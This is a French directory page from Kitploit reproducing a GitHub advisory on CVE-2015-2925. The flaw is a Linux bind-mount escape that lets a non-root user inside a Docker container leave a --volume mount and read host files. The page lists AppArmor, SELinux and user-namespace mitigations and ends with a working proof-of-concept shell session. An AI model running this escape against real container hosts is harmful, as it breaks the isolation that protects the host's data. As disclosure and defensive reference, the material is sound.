Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
docker_cve-2015-2925 — Docker + CVE-2015-2925 = s'échapper de --volume | Kitploit
Outils/GitHubGitHub/kagami/docker_cve-2015-2925
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingÉvasion de Conteneur
GitHubkagami/docker_cve-2015-2925

docker_cve-2015-2925

Docker + CVE-2015-2925 = s'échapper de --volume

Voir le dépôt
112il y a 11 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Docker + CVE-2015-2925 = s'échapper de --volume

Une récente vulnérabilité dans Linux connue depuis environ une demi-année (plusieurs mois publiquement) rendait possible l'évasion des bind mounts. En particulier, dans le cas de Docker, il est possible de s'échapper de l'intérieur du répertoire monté via l'option --volume pour accéder au système de fichiers de l'hôte.

L'équipe de sécurité Docker est déjà informée du problème et a autorisé la publication de cette information afin d'attirer l'attention du public.

Merci à Jann Horn de l'avoir signalé ; en gros, je ne faisais que le reproduire.

Atténuation

Chacune de ces mesures sera suffisante :

  • Noyau avec AppArmor activé et profil Docker AppArmor
  • Noyau avec SELinux activé et politique Docker SELinux
  • Espaces de noms utilisateur désactivés dans le noyau

Remarques

  • Ce n'est pas encore corrigé en amont ni dans les distributions et devrait fonctionner sur tout noyau récent
  • Cela ne nécessite pas d'être root à l'intérieur du conteneur
  • Les distributions fournissent différentes versions du paquet util-linux auquel appartient unshare(1) et il peut retourner « Operation not permitted » dans votre cas ; le paquet de Debian Jessie a été testé et fonctionne comme prévu

Preuve de concept

root@kitploit:~
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
Télécharger l’outil